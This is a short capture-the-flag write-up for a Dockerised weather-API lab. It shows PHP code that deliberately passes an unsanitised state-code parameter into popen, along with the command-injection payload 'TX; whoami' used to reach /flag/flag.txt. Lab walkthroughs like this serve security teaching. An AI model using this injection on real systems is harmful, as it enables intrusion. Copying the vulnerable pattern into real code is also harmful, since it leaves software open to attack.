Want to run this Docker container locally?

docker run -d -p 9018:80 --restart always --name flag-o joshbeck2024/ctf-weather-api-rce-flag-o

Objective: cat the file /flag/flag.txt

This webpage was kind of fun to write because it actually queries the NWS and provides current data based on State Codes like: TX.

We are given the code which looks like this:

<?php
  $stateCode = $_GET['state-code'];
  // echo $stateCode; // Debugging
  
  // VULNERABILITY: User input is concatenated directly into the shell command without sanitization.
  $program = '/usr/bin/python3 /var/www/html/fetch_data.py'." ".$stateCode;

  // Use popen or exec to run the command
  // $output = exec($program);
  
  // Open a pipe to the program's output
  $handle = popen($program, 'r');

  // Read the output line by line
  while(!feof($handle)) {
    $line = fgets($handle);
    echo $line;
    echo "<br><br>";
  }

  // Close the pipe
  pclose($handle);
?>

The vulnerable piece is here:

$program = '/usr/bin/python3 /var/www/html/fetch_data.py'." ".$stateCode;

// Use the exec function to run the program and save its output in a variable
$output = exec($program);

On the back end, the web server is running python3. If we handed the form a state code like ‘TX’, the command would look like this:

/usr/bin/python3 /var/www/html/fetch_data.py TX

With Bash, we can use the semicolon to string two commands together. The exploit here would look like this:

TX; whoami

If we enter this into the web form you’ll see that www-root appears at the bottom of the returned response. If you have walked through the previous flags, returning a reverse shell or simply running the cat command will be enough to knock this one out.

The objective is to cat the file /flag/flag.txt